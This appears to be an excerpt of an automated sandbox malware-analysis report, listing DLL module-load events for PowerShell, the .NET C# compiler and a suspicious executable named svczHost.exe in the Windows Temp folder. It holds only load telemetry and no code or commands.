Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: apphelp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: edgegdi.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: icu.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: winhttp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: mswsock.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: wshunix.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: winrnr.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: nlaapi.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: wshbth.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: devobj.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: napinsp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: ntmarta.dll
